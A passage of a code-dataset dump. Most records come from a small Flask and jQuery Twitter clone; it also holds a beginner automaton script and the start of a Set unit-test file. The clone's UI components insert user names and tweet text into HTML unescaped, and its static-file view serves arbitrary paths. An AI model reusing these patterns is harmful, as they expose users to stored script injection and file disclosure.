input').val();\n \n return this.authService.signin(email, password)\n .then(function(data) {\n self._setAccessToken(data.data['access_token'])\n self._setRefreshToken(data.data['refresh_token'])\n return data;\n });\n }\n\n _goToHome() {\n document.location = \"/home\";\n }\n\n signup() {\n var self = this;\n let name = $('.signup-name input').val();\n let email = $('.signup-email input').val();\n let password = $('.signup-password input').val();\n \n this.authService.signup(name, email, password)\n .then(function (argument) {\n self._goToSigninPage();\n }).catch(function() {\n self._goToSignupPage();\n })\n }\n\n _goToSigninPage() {\n document.location = '/?show=signin';\n }\n\n _goToSignupPage() {\n document.location = '/?show=signup';\n }\n}\n\nclass AuthService {\n signup(name, email, password) {\n return $.ajax({\n url: \"/auth/signup.json\",\n type: 'POST',\n data: {\n name: name,\n email: email,\n password: password\n }\n });\n }\n\n signin(email, password) {\n return $.ajax({\n url: \"/auth/signin.json\",\n method: 'POST',\n context: this,\n data: {\n email: email,\n password: password\n }\n });\n }\n\n validateAccessToken(accessToken) {\n return $.ajax({\n url: \"/auth/validate-token.json\",\n method: 'POST',\n beforeSend: function (xhr) {\n xhr.setRequestHeader('Authorization', 'Bearer ' + accessToken);\n }\n });\n }\n}\n\n\nfunction indexPageView() {\n if (location.search.length) {\n let params = location.search.substring(1).split('=')\n if(params[1] == 'signup') {\n $(\".signin\").hide();\n } else if(params[1] == 'signin') {\n $(\".signup\").hide();\n }\n }\n}\n\n$(function(){\n indexPageView();\n\n let auth = new Auth();\n $('.signin-submit').click(function (argument) {\n auth.signin();\n });\n\n $('.signup-submit').click(function (argument) {\n auth.signup()\n });\n \n})"
},
{
"alpha_fraction": 0.5835305452346802,
"alphanum_fraction": 0.5906294584274292,
"avg_line_length": 29.955883026123047,
"blob_id": "60eb227e2a35fc51dec0876be78e74dc49e4ebef",
"content_id": "8a3fcc4fe938236aafd85125270c92944834ac28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2113,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 68,
"path": "/src/views/auth.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom src import db, jwt, app\nfrom flask_jwt_extended import create_access_token, create_refresh_token, jwt_required\nfrom datetime import timedelta\n\n\nclass Auth(BaseView):\n def post(self):\n args = request.form\n if not('email' in args and 'password' in args):\n return self._404('Invalid data')\n return self._authenticate_user(args['email'], args['password'])\n\n def _authenticate_user(self, email, password):\n user = models.User().get_by_email(email)\n if user is None:\n return self._404('User does\\'t exist.')\n\n if user.authenticate(password):\n access_token, refresh_token = self._create_tokens(user.oid)\n return self._success({\n 'access_token': access_token,\n 'refresh_token': refresh_token\n })\n else:\n return self._404('Invalid credentials.')\n\n def _create_tokens(self, identity):\n access_token = create_access_token(\n identity, \n expires_delta=timedelta(days=app.config['ACCESS_TOKEN_EXPIRY'])\n )\n refresh_token = create_refresh_token(\n identity,\n expires_delta=timedelta(days=app.config['REFRESH_TOKEN_EXPIRY'])\n )\n return access_token, refresh_token\n\n\nclass Signup(BaseView):\n def post(self):\n args = request.form\n if not('name' in args and 'email' in args and 'password' in args):\n return self._404('Invalid data')\n\n return self._create_user(args)\n\n def _create_user(self, args):\n user = models.User(name=args['name'], email=args['email'], password=args['password'])\n try:\n user.save()\n except Exception as e:\n return self._404('User already exists')\n \n return self._success({\n 'name': user.name,\n 'email': user.email,\n 'oid': user.oid\n })\n\n\nclass ValidateAccessToken(BaseView):\n\n @jwt_required\n def post(self):\n return self._success()\n "
},
{
"alpha_fraction": 0.6427648663520813,
"alphanum_fraction": 0.6427648663520813,
"avg_line_length": 27.685184478759766,
"blob_id": "6edd4133a091a8795f600e780bfb73de38221168",
"content_id": "24a88efdda6500b8dd9bcbb7f5f8cb1e53fe077f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1548,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 54,
"path": "/src/ui/js/home.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport DefaultView from \"/asset/js/views.js\";\nimport TweetModal from \"/asset/js/components/tweetModal.js\";\nimport FollowerList from \"/asset/js/components/followerList.js\";\nimport FollowersTweetList from \"/asset/js/components/followersTweetList.js\";\nimport UserSuggestions from \"/asset/js/components/userSuggestions.js\";\n\nclass Home extends DefaultView {\n constructor() {\n super()\n }\n\n _setupView(oid) {\n let self = this;\n this.userService.getUser(oid)\n .then(function(data) {\n self._setupUserProfile(data.data)\n });\n\n let tweetModal = new TweetModal('tweetbox');\n tweetModal.onTweetPublished = function (tweetContent) {\n tweetModal.closeModal();\n }\n tweetModal.run()\n\n let followerList = new FollowerList('followerslist')\n followerList.run()\n\n let followersTweetList = new FollowersTweetList('followerstweetlist', this.getSignedInUserOid())\n followersTweetList.run()\n\n let userSuggestions = new UserSuggestions('user-suggestions', oid);\n userSuggestions.run();\n\n }\n \n _setupUserSuggestions(data) {\n let userSuggestions = this._renderUserCell(data);\n $('.user-suggestions .users-list').html(userSuggestions);\n }\n}\n\n$(function(){\n let home = new Home(); \n $(\".page-controls .logout\").click(function() {\n localStorage.clear();\n home.goToSignin();\n })\n\n $(\".page-controls .post-tweet\").click(function(){\n tweetModal.openModal();\n })\n});"
},
{
"alpha_fraction": 0.4996342360973358,
"alphanum_fraction": 0.5003657937049866,
"avg_line_length": 30.813953399658203,
"blob_id": "a773e861aad677b54b5c3f4b30fbb47f5dbf5880",
"content_id": "0933932fa8791a599f740880375aa01690120275",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 43,
"path": "/src/ui/js/components/followerList.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {FollowerService} from \"/asset/js/services.js\";\n\nexport default class FollowerList extends BaseComponent {\n constructor(tagName) {\n super(tagName);\n let self = this;\n this.followerService = new FollowerService();\n this.signedInUser = this._getSignedInUserOid();\n }\n\n run() {\n let self = this;\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n this.followerService.getFollowers(this.signedInUser)\n .then(function(data) {\n $(self.tagName).html(self._render(data.data));\n self._bindEvents();\n })\n }\n\n _render(users) {\n let userCells = users.map(function(user) {\n if(user == undefined) return;\n return `<div class=\"user\">\n <div class=\"name\">\n <a href=\"/user/${user.oid}\">${user.name}</a>\n </div>\n <div class=\"email\">${user.email}</div>\n </div>`;\n }).join('')\n return `<div class=\"followers\">\n <div>Followers (<span class=\"followers-count\">0</span>)</div>\n <div class=\"users-list\">\n ${userCells}\n </div>\n </div>`;\n }\n}"
},
{
"alpha_fraction": 0.6770186424255371,
"alphanum_fraction": 0.6770186424255371,
"avg_line_length": 39.275001525878906,
"blob_id": "7151c1762c389f8ecc81c748984294340cbe4588",
"content_id": "29e329da08c7893fc6edf0986faf91f270591d3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 40,
"path": "/src/urls.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import app\nfrom src.views import (\n user, auth, tweet, follower, ui\n)\n\n# API URI's\n# AUTH\napp.add_url_rule('/auth/signup.json', view_func=auth.Signup.as_view('signup'), methods=['POST',])\napp.add_url_rule('/auth/signin.json', view_func=auth.Auth.as_view('signin'), methods=['POST',])\napp.add_url_rule('/auth/validate-token.json', view_func=auth.ValidateAccessToken.as_view('validate'), methods=['POST',])\n\n# User\napp.add_url_rule('/user.json', view_func=user.User.as_view('get_users'), methods=['GET',])\napp.add_url_rule('/user/<string:oid>.json', view_func=user.User.as_view('get_user'), methods=['GET',])\n\napp.add_url_rule(\n '/tweet/<string:oid>.json', view_func=tweet.Tweet.as_view('read_tweets'), methods=['GET'])\napp.add_url_rule(\n '/tweet.json', view_func=tweet.Tweet.as_view('post_tweet'), methods=['POST'])\n\napp.add_url_rule(\n '/follower/<string:oid>.json',\n view_func=follower.Follower.as_view('get_followers'), methods=['GET'])\n\napp.add_url_rule(\n '/follower/<string:oid>/tweets.json',\n view_func=follower.FollowerTweets.as_view('get_followers_tweet'), methods=['GET'])\n\n\napp.add_url_rule(\n '/follower.json',\n view_func=follower.Follower.as_view('create_followers'), methods=['POST'])\n\n\n# TEMPLATE AND ASSET URI's\napp.add_url_rule('/', view_func=ui.Index.as_view('index'), methods=['GET'])\napp.add_url_rule('/asset/<path:path>', view_func=ui.Static.as_view('asset'), methods=['GET'])\n\napp.add_url_rule('/home', view_func=ui.Home.as_view('home'), methods=['GET'])\napp.add_url_rule('/user/<string:oid>', view_func=ui.Profile.as_view('user_profile'), methods=['GET'])"
},
{
"alpha_fraction": 0.6528555154800415,
"alphanum_fraction": 0.6539753675460815,
"avg_line_length": 29.79310417175293,
"blob_id": "0c941fbffb062de0d57c6da4ee58afad2b8df636",
"content_id": "dd07ef710009cdc003294ca64ee30964b179dde5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 893,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 29,
"path": "/src/views/ui.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import app\nfrom src.views import StaticMixin\nfrom flask import Response\n \n\nclass Index(StaticMixin, BaseView):\n def get(self):\n content = self._get_file(\"templates/index.html\")\n return Response(content, mimetype=\"text/html\")\n\nclass Static(StaticMixin, BaseView):\n mimes = {\n 'js': 'text/javascript',\n 'css': 'text/css'\n }\n def get(self, path):\n content = self._get_file(path)\n return Response(content, mimetype=self.mimes[path.split('.')[-1]])\n\nclass Home(StaticMixin, BaseView):\n def get(self):\n content = self._get_file(\"templates/home.html\")\n return Response(content, mimetype=\"text/html\")\n\nclass Profile(StaticMixin, BaseView):\n def get(self, oid):\n content = self._get_file(\"templates/profile.html\")\n return Response(content, mimetype=\"text/html\")\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.7179487347602844,
"avg_line_length": 18.75,
"blob_id": "bbbe5a654418e5706cae40bf94e8b181db6967ac",
"content_id": "3a84ee6ba002bfbbe2acbd2e560983eb08507992",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "Flask==1.0.2\nFlask-SQLAlchemy==2.3.2\nFlask-API==1.0\nFlask-JWT-Extended==3.13.1"
},
{
"alpha_fraction": 0.5276710391044617,
"alphanum_fraction": 0.5315142273902893,
"avg_line_length": 35.64788818359375,
"blob_id": "a294ee712ab24ba77bdc5cc30193368fd79995ae",
"content_id": "ad496b4266f3bcf156065a048f3769672f65fba6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2602,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 71,
"path": "/src/ui/js/components/tweetModal.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {TweetService} from \"/asset/js/services.js\";\n\nexport default class TweetModal extends BaseComponent {\n constructor(tagName) {\n super(tagName)\n this.tweetService = new TweetService();\n this.signedInUserOid = this._getSignedInUserOid();\n }\n\n _render() {\n return `<div id=\"tweet-modal-overlay\">\n <div class=\"tweet-modal\">\n <div class=\"modal-header\">Tweet</div>\n <div class=\"modal-body\">\n <div class=\"tweet-input\">\n <textarea placeholder=\"What's on your mind?\"></textarea>\n </div>\n <div class=\"tweet-controls\">\n <span class=\"char-count\">(0/280)</span>\n <button class=\"tweet-cancel-button\" type=\"button\">Cancel</button>\n <button class=\"tweet-publish-button\" type=\"button\">Publish</button>\n </div>\n </div>\n </div>\n </div>`;\n }\n\n _bindEvents() {\n let self = this;\n $('#tweet-modal-overlay .modal-body textarea').keyup(function() {\n let tweetLength = $('#tweet-modal-overlay .modal-body textarea').val().length;\n $('#tweet-modal-overlay .modal-body .char-count').html(`(${tweetLength}/280)`);\n if (tweetLength > 280) {\n $('#tweet-modal-overlay .modal-body .char-count').css('color', 'red');\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').hide();\n } else {\n $('#tweet-modal-overlay .modal-body .char-count').css('color', 'black');\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').show();\n }\n })\n\n $('#tweet-modal-overlay .modal-body .tweet-cancel-button').click(function() {\n $('#tweet-modal-overlay').hide();\n })\n\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').click(function() {\n let tweetContent = $('#tweet-modal-overlay .modal-body textarea').val();\n if(!tweetContent.length) return false;\n \n self.tweetService.postTweet(self.signedInUserOid, tweetContent)\n .then(function(){\n self.onTweetPublished(tweetContent);\n })\n })\n }\n\n onTweetPublished() {\n\n }\n\n closeModal() {\n $('#tweet-modal-overlay .tweet-modal .modal-body .tweet-cancel-button').click();\n }\n\n openModal() {\n $('#tweet-modal-overlay').show();\n }\n}\n"
},
{
"alpha_fraction": 0.6237623691558838,
"alphanum_fraction": 0.6295865178108215,
"avg_line_length": 30.218181610107422,
"blob_id": "8ae98ed86a4539e873cff42bee340f39d2612b74",
"content_id": "b3e02fdcff4e2fc46a93f8bb03ea9c3197246b87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1717,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 55,
"path": "/src/models/user.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nclass User(BaseModel, db.Model):\n name = db.Column(db.String(150), nullable=False)\n email = db.Column(db.String(200), unique=True)\n _password_hash = db.Column(db.Text, nullable=False)\n tweets = relationship('Tweet', back_populates='user')\n # followers = relationship('Follower', back_populates='follower')\n is_active = db.Column(db.Boolean, nullable=False, default=True)\n\n def __init__(self, name=None, email=None, password=None):\n if name is not None and email is not None and password is not None:\n self.name = name\n self.email = email\n self.password = password\n\n super().__init__()\n\n @validates('email')\n def validate_email(self, key, email):\n assert '@' in email\n return email\n\n def authenticate(self, password):\n return check_password_hash(self._password_hash, password)\n\n @hybrid_property\n def password(self):\n return\n\n @password.setter\n def password(self, _password):\n self._password_hash = generate_password_hash(_password)\n\n def get_by_oid(self, oid):\n users = self.query.filter(User.oid == oid)\n \n if users.count() == 1:\n return users[0]\n else:\n return None\n\n def get_by_email(self, email):\n users = self.query.filter(User.email == email)\n if users.count() == 1:\n return users[0]\n else:\n return None\n\n def __repr__(self):\n return self.email\n"
},
{
"alpha_fraction": 0.7881355881690979,
"alphanum_fraction": 0.7881355881690979,
"avg_line_length": 20.545454025268555,
"blob_id": "fc5f0334c0b074147e892e778eb6225f8a5b47c7",
"content_id": "e512c0a30408e0c4902f71502d7cfd21e0cc199a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 236,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/src/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom src.settings import Config\nfrom flask_jwt_extended import JWTManager\n\napp = Flask(__name__)\n\napp.config.from_object(Config)\n\ndb = SQLAlchemy(app)\njwt = JWTManager(app)"
},
{
"alpha_fraction": 0.5291396975517273,
"alphanum_fraction": 0.5291396975517273,
"avg_line_length": 28.243244171142578,
"blob_id": "9a46a0fa979597510cfa4c23311bbf50b37c9617",
"content_id": "5b62054cdada90b2e313dca9254ad893d1d0e951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1081,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 37,
"path": "/src/ui/js/components/tweetList.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {TweetService} from \"/asset/js/services.js\";\n\nexport default class TweetList extends BaseComponent {\n constructor(tagName, userOid) {\n super(tagName);\n let self = this;\n this.userOid = userOid;\n this.tweetService = new TweetService();\n }\n\n run() {\n let self = this;\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n this.tweetService.getTweetsOfUser(this.userOid)\n .then(function(data) {\n $(self.tagName).html(self._render(data.data));\n self._bindEvents();\n })\n }\n\n _render(tweets) {\n return tweets.map(function(tweet) {\n return `<div class=\"tweet-box\">\n <div class=\"content\">${tweet.tweet}</div>\n <div class=\"meta\">\n <div class=\"name\">${tweet.name}</div>\n <div class=\"timestamp\">${tweet.created_at}</div>\n </div>\n </div>`;\n }).join('')\n }\n}"
},
{
"alpha_fraction": 0.5191537737846375,
"alphanum_fraction": 0.5191537737846375,
"avg_line_length": 20.875,
"blob_id": "f564982b4f719b4a6c2a9d043e12772348b1a3a2",
"content_id": "88cd7a2b8e1633938c742333abad6dd4d33b1d52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 80,
"path": "/src/ui/js/services.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nexport default class BaseService {\n constructor() {\n this.accessToken = localStorage.getItem('accessToken', null);\n }\n\n _ajax(url, method, data) {\n var self = this;\n if (url == undefined) {\n return false;\n }\n\n if (method == undefined) {\n method = 'GET';\n }\n\n if (data == undefined) {\n data = {};\n }\n return $.ajax({\n url: url,\n type: method.toUpperCase(),\n data: data,\n beforeSend: function (xhr) {\n xhr.setRequestHeader('Authorization', 'Bearer ' + self.accessToken);\n }\n })\n }\n}\n\n\nclass TweetService extends BaseService{\n constructor() {\n super();\n this.followerService = new FollowerService();\n \n }\n\n getTweetsOfUser(oid) {\n return this._ajax(\"/tweet/\" + oid + '.json')\n }\n\n getTweetsOfFollowers(oid) {\n return this._ajax(\"/follower/\" + oid + \"/tweets.json\")\n }\n\n postTweet(userOid, tweet) {\n return this._ajax('/tweet.json', 'POST', {\n 'oid': userOid,\n 'content': tweet\n })\n }\n}\n\nclass UserService extends BaseService {\n getUser(oid) {\n return this._ajax(\"/user/\" + oid + '.json');\n }\n\n getUsers() {\n return this._ajax(\"/user.json\");\n }\n}\n\n\nclass FollowerService extends BaseService{\n getFollowers(userOid) {\n return this._ajax(\"/follower/\" + userOid + '.json');\n }\n\n followUser(leader_oid, follower_oid) {\n return this._ajax(\"/follower.json\", 'POST', {\n leader_oid: leader_oid,\n follower_oid: follower_oid\n })\n }\n}\n\nexport {UserService, FollowerService, TweetService};"
},
{
"alpha_fraction": 0.63564133644104,
"alphanum_fraction": 0.63564133644104,
"avg_line_length": 27.387096405029297,
"blob_id": "24fe79590ef07875c2a652e8e3f66e99b417aa9e",
"content_id": "ca0a9faa7de333a2af227bbaa16dbbf3e0e72ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 31,
"path": "/src/models/tweet.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\nclass Tweet(BaseModel, db.Model):\n _tweet = db.Column(db.Text, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = relationship('User', back_populates='tweets', foreign_keys=[user_id])\n\n def __init__(self, user=None, tweet=None):\n if user is not None:\n self.user_id = user.id\n\n if tweet is not None:\n self.tweet = tweet\n\n super().__init__()\n\n @hybrid_property\n def tweet(self):\n return self._tweet\n\n @validates\n def validate_tweet(self, _tweet):\n assert len(_tweet) <= app.config['TWEET_CHARACTER_LIMIT']\n return _tweet\n\n @tweet.setter\n def tweet(self, _tweet):\n self._tweet = _tweet\n\n"
}
] | 27 |
ThinkAI-GP/KNN
|
https://github.com/ThinkAI-GP/KNN
|
ab2bd5e34f58a8f3a7df15b71e32d265dc089742
|
f0bbb02d752dab85b299902b0778ff8d64f9f5a0
|
85d264cf2a5646a9bf9b3d462827070b1e3a226f
|
refs/heads/master
| 2020-09-17T04:29:34.165532 | 2019-11-25T17:14:17 | 2019-11-25T17:14:17 | 223,989,038 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7227877974510193,
"alphanum_fraction": 0.7259201407432556,
"avg_line_length": 20.21666717529297,
"blob_id": "9308f8b2fd71f5bd96fbcead8a5f88b8b94896e5",
"content_id": "d7b9106c58a71b5b310405ec3ca1f02d4f769c58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 60,
"path": "/KNN.py",
"repo_name": "ThinkAI-GP/KNN",
"src_encoding": "UTF-8",
"text": "#requirements \nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nsns.set()\n\n#we first load our dataser into dataframes\nbreast_cancer = load_breast_cancer()\nX = pd.DataFrame(breast_cancer.data, columns=breast_cancer.feature_names)\nX = X[['mean area', 'mean compactness']]\ny = pd.Categorical.from_codes(breast_cancer.target, breast_cancer.target_names)\ny = pd.get_dummies(y, drop_first=True)\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)\n\n\n\nthinkAI_knn = KNeighborsClassifier(n_neighbors=5, metric='euclidean')\nthinkAI_knn.fit(X_train, y_train)\n\n\n\ny_pred = thinkAI_knn.predict(X_test)\n\n\n#we compare the prediction results with the actual ones \n\nsns.scatterplot(\n x='mean area',\n y='mean compactness',\n hue='benign',\n data=X_test.join(y_test, how='outer')\n)\n\n\n\n\nplt.scatter(\n X_test['mean area'],\n X_test['mean compactness'],\n c=y_pred,\n cmap='coolwarm',\n alpha=0.7\n)\n\n\n# another way to calculate precision is confusion matrix\n\n\nconfusion_matrix(y_test, y_pred)\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.7214285731315613,
"alphanum_fraction": 0.7397959232330322,
"avg_line_length": 30.483871459960938,
"blob_id": "6202c3023cb558c15294edc49da4108df4922250",
"content_id": "841bb0a28faa5b84039962815ee0435d46433fe8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 31,
"path": "/README.md",
"repo_name": "ThinkAI-GP/KNN",
"src_encoding": "UTF-8",
"text": " # KNN\n A non-parametric method used for classification and regression\n\n\n\n# ***KNN algorithm:***\n\nA simple example of KNN in breast cancer classification implemented through python.\n\n## _requirements:_\n`python 3+`\n`pandas 0.25.1`\n`sklearn 0.21.3`\n`matplotlib 3.0.2`\n\n## _installation:_\n- pip install `pandas`\n- pip install `sklearn`\n- pip install `matplotlib`\n(you can use `conda` instead of `pip` in the `anaconda` environement)\n\n## _usages:_\nRun the command `python KNN.py` \n(you may try `py KNN.py` if the command aside doesn't work)\n# OR if you are using anaconda + jupyter\nJust load the file KNN.ipynb in jupyter \n\n## _references:_\n- [Wikipedia](https://en.wikipedia.org/wiki/K-nearest_neighbors_algorithm) gives a good description on the idea behind\n- you can check the full explanation of the code source [Here](https://towardsdatascience.com/k-nearest-neighbor-python-2fccc47d2a55) .\nOpen the link in incognito mode if you are having trouble to access the full content \n\n\n"
}
] | 2 |
Kevin-Contreras/TAREAS
|
https://github.com/Kevin-Contreras/TAREAS
|
c0cc3bf2ea9a43f50eebd098b52a47ff723ed407
|
1e8e75c84b980a5e3aa666e692414ff0ab2b5919
|
8c3ef7ebc077fd20ac63df7ab726a14676bc66c4
|
refs/heads/master
| 2022-12-07T21:08:33.202217 | 2020-09-06T10:32:35 | 2020-09-06T10:32:35 | 293,253,549 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4581589996814728,
"alphanum_fraction": 0.47350069880485535,
"avg_line_length": 28.285715103149414,
"blob_id": "aa45161ad3c2188571fc96abd0a3477f30bf6283",
"content_id": "52fae029511cdecc66d3bf86b01ae23680e5b77e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1434,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 49,
"path": "/TAREA5/AUTOMATA.PY",
"repo_name": "Kevin-Contreras/TAREAS",
"src_encoding": "UTF-8",
"text": "print (\"colocar las palabras\")\npalabras = input()\ndef automata ():\n letras=[];\n numeroletras = 0\n contador =0;\n contador2 =0;\n for letra in palabras:\n letras.append(letra)\n numeroletras+=1\n if(letra == \"_\"):\n print(\"si pertenece a la sintaxis-----\" + letra)\n else:\n if(letra.isalpha()==True):\n if(contador2==0):\n contador2=1\n print(\"pertenece a la sintaxis ---- \"+ letra)\n else:\n print(\"no pertenece a la sintaxis----- \" + letra)\n else: \n if(letra.isnumeric()):\n if(contador==0):\n contador=1\n print(\"el numero pertenece a la sintaxis---- \"+ letra)\n else:\n print(\"el numero no pertenece a la sintaxis---- \"+ letra) \n print(\"*******************Sintaxis error********************\")\ndef automata2():\n letras=[];\n numeroletras = 0\n contador =0;\n contador2 =0;\n y=0;\n for letra in palabras:\n if(letra.isalpha()):\n print (\"la sintaxis es correcta---\" + letra)\n else:\n if(y == 0):\n print(\"sintaxis no reconcocida---\" + letra)\n y=1\n else:\n if(letra.isnumeric()):\n print(\"sintaxis reconocida\")\n print(\"**********************Sintaxis error*********************\")\n\nprint(\"-------------------camino 1----------------------------\") \nautomata() \nprint(\"-------------------camino 2---------------------------\")\nautomata2()"
}
] | 1 |
reneighbor/set-python
|
https://github.com/reneighbor/set-python
|
44ed40132fb1a4c8fcc4067721486c4197863d98
|
6c2778e52d147e823bae941c1c81b8ea902c857c
|
c54aad78656777e9330574178ec5c720fa069d8b
|
refs/heads/master
| 2019-01-02T06:32:59.701907 | 2015-09-15T07:01:12 | 2015-09-15T07:01:12 | 42,341,262 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5012701153755188,
"alphanum_fraction": 0.5416314005851746,
"avg_line_length": 24.314285278320312,
"blob_id": "2d73c2c782785d0ba372146fbaa56b73da011da4",
"content_id": "7dd4525bcd2171626376a4bdd1001cb857bbda08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3543,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 140,
"path": "/tests.py",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom _set import Set\n\nclass SetTest(unittest.TestCase):\n\n def test_construct_empty(self):\n test_set = Set()\n\n assert test_set.elements == []\n\n def test_construct_initial_elements(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.elements == [1, 2, 3]\n\n def test_construct_initial_elements_duplicates(self):\n test_set = Set([1, 2, 2])\n\n assert test_set.elements == [1, 2]\n\n def test_add(self):\n test_set = Set([1, 2, 3])\n test_set.add(4)\n\n assert test_set.elements == [1, 2, 3, 4]\n\n def test_add_duplicate(self):\n test_set = Set([1, 2, 3])\n test_set.add(3)\n\n assert test_set.elements == [1, 2, 3]\n\n def test_remove(self):\n test_set = Set([1, 2, 3])\n test_set.remove(3)\n\n assert test_set.elements == [1, 2]\n\n def test_remove_not_present(self):\n test_set = Set([1, 2, 3])\n test_set.remove(4)\n\n assert test_set.elements == [1, 2, 3]\n\n def test_len(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.len() == 3\n\n def test_len_zero(self):\n test_set = Set()\n\n assert test_set.len() == 0\n\n def test_contains(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.contains(1)\n\n def test_contains_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.contains(4) == False\n\n def test_equals(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals(Set([1, 2, 3]))\n\n def test_equals_wrong_class(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals([1, 2, 3]) == False\n\n def test_equals_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals(Set([1, 2])) == False\n\n def test_subset_of(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2, 3, 4]))\n\n def test_subset_of_equivalent(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2, 3]))\n\n def test_subset_of_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2])) == False\n\n def test_union(self):\n test_set = Set([1, 2, 3])\n union_set = test_set.union(Set([4, 5]))\n\n # TODO ASK is it a problem that this fails?\n # assert union_set == Set([1, 2, 3, 4, 5])\n assert union_set.equals(Set([1, 2, 3, 4, 5]))\n\n def test_union_duplicates(self):\n test_set = Set([1, 2, 3])\n union_set = test_set.union(Set([1, 2]))\n\n # TODO ASK is it a problem that this fails?\n # assert union_set == Set([1, 2, 3])\n assert union_set.equals(Set([1, 2, 3]))\n\n def test_intersect(self):\n test_set = Set([1, 2, 